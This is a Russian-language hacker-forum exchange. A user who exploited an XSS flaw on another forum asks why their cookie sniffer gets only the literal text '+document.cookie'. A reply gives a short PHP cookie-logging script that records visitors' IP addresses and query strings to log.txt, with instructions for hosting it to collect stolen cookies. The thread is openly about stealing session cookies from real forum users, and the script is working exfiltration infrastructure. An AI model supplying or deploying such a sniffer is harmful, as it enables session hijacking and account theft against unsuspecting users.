Народ, понимающий в XSS отзовотесь. Нашел XSS уязвимость на форуме, использовал её. Но на античатовский сниффер вместо куков приходит лишь
+document.cookie. Хотя этот форум дает куки и на компе я их нашел. Почему не приходят куки?

Незнаю. Лично я пользюсь вот таким снифером:
<?
$f=Fopen("./log.txt","a+t") or die ("!!!");
Fputs($f,"$REMOTE_ADDR ");
Fputs($f,$QUERY_STRING);
Fputs($f,"\n");
?>
Сохраняешь его с расширенем php и все+ пустой txt файл создаешь с названием log. Скидываешь это на хостинг (тот же Holm) и пользуйся сколько хочешь. Все куки сохраняются в файле log.txt